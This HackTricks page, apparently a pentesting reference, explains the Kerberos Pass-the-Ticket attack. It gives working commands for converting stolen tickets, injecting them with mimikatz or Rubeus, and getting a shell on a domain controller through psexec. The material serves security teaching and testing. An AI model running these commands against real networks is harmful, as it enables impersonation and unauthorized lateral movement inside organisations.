Links

Pass the Ticket

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:

Pass The Ticket (PTT)

In the Pass The Ticket (PTT) attack method, attackers steal a user's authentication ticket instead of their password or hash values. This stolen ticket is then used to impersonate the user, gaining unauthorized access to resources and services within a network.
Read:

Swaping Linux and Windows tickets between platforms

The ticket_converter tool converts ticket formats using just the ticket itself and an output file.
python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi
python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache
In Windows Kekeo can be used.

Pass The Ticket Attack

Linux
export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/[email protected] -k -no-pass
Windows
#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe][email protected]"
.\Rubeus.exe ptt /ticket:[0;28419fe][email protected]
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

References

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks: